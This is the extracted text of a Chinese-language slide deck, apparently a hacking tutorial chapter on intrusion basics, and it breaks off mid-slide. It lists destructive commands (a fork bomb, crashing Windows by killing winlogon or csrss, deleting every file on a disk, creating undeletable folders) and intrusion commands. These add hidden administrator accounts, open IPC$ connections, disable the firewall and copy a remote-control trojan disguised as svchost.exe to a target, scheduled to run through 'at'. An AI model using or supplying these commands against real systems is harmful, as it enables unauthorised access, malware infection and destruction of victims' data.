第六章 网络安全攻防技术教程.ppt

Page * Version 2.0 Page * Page * Page * Page * Page * Page * Page * Page * Page * Page * 网络入侵基础知识、入侵实战 第2章 李冰川 QQ：594520163 Email：aizhihuo218@163.com Page * 章节目标 常用的DOS命令 常用的入侵命令 Hack实战一：命令行下的入侵 Hack实战二：图形界面的入侵 流行远程控制木马的使用方法 键盘记录程序的使用方法 Page * 常用DOS命令1 Cd 切换目录 Dir 列出所有文件信息 Del 删除文件 Md 创建目录 Rd删除目录 Copy 复制 Xcopy 复制文件和文件夹 Cls 清屏 Attrib 修改文件、文件夹属性 Date、Time显示日期、时间 Page * 常用DOS命令2 Path 系统路径 Set 显示、设置系统信息 Ren(Rename)重命名 Subst 虚拟磁盘 Ver 显示操作系统版本 Help 帮助 /? 显示某条命令的帮助 Page * 非主流DOS命令1 1.重复执行某条命令直至死机的批处理代码： start cmd %0 2.复制一个文件的磁盘的每个子文件夹当中： for /r /d %a in (*) do copy test.txt %a /y 3.不停地执行同一条命令： for /l %a in (1,0,2) do net send 炸弹来了！ 4.死机,蓝屏 ntsd -c q -pn winlogon.exe ntsd -c q -pn csrss.exe Page * 非主流DOS命令2 5.删除磁盘所有文件： del * /a /s /q /f 6.创建名字为空的文件夹： md (按住Alt键，在小键盘上按2,5,5,然后松开Alt,回车) 7.创建无法删除的特殊名字文件夹： md \\.\c:\con md \\.\c:\aux 8.创建无法双击打开无法删除的另类文件夹： md test..\ rd test..\ /s /d Page * 常用入侵命令1 net user 用户名 密码 /add (建立用户) net localgroup administrators 用户名 密码 /add (将用户加到管理员，使其拥有管理权限) net user guest /active:Yes (激活guest用户) net user guest 12345 (修改guest密码为12345) net user (查看账号属性) net use \\ip\ipc$ “” /user (建立空IPC连接) net use \\ip\ipc$ “密码” /user:“用户名” (建立IPC非空连接，非空链接就是需要帐户和密码) net use \\ip\ipc$ /del (删除IPC空连接) net use z: \\\c$(映射目标主机磁盘c盘到本地磁盘Z盘) Page * 常用入侵命令2 net start (查看开启了哪些服务) net start 服务名 (开启服务) net time \\目标IP (查看对方时间) net view (查看局域网中开启了哪些共享) net share (查看本地开启的哪些共享) net share C$/del (删除C盘默认共享) netstat -an (查看计算机开放了哪些端口) Copy xx.exe\\ip\admin$\System32 (将当前xx.exe复制到对方Admin$共享的System32目录内) Page * 常用入侵命令3 sc config tlnesvr start= auto(修改telnet服务的启动方式为自动，auto前面有一个空格) net stop sharedaccess(关闭系统自带的防火墙) net send IP 消息(利用messenger服务向目标IP发送消息) ntsd -c q -pn winlogon.exe(蓝屏重启) ntsd -c q -pn csrss.exe(死机) tasklist(查看进程) taskkill(结束进程) Page * 实战：纯DOS命令入侵 net use \\0\ipc$ “123” /user:”administrator” net time \\0 Copy c:\server.exe \\0\admin$\svchost.exe At \\0 12:00 start c:\windows\svchost.exe 这样，对方就中了灰鸽子服务端了。 Page * 几个小例子 开启禁用的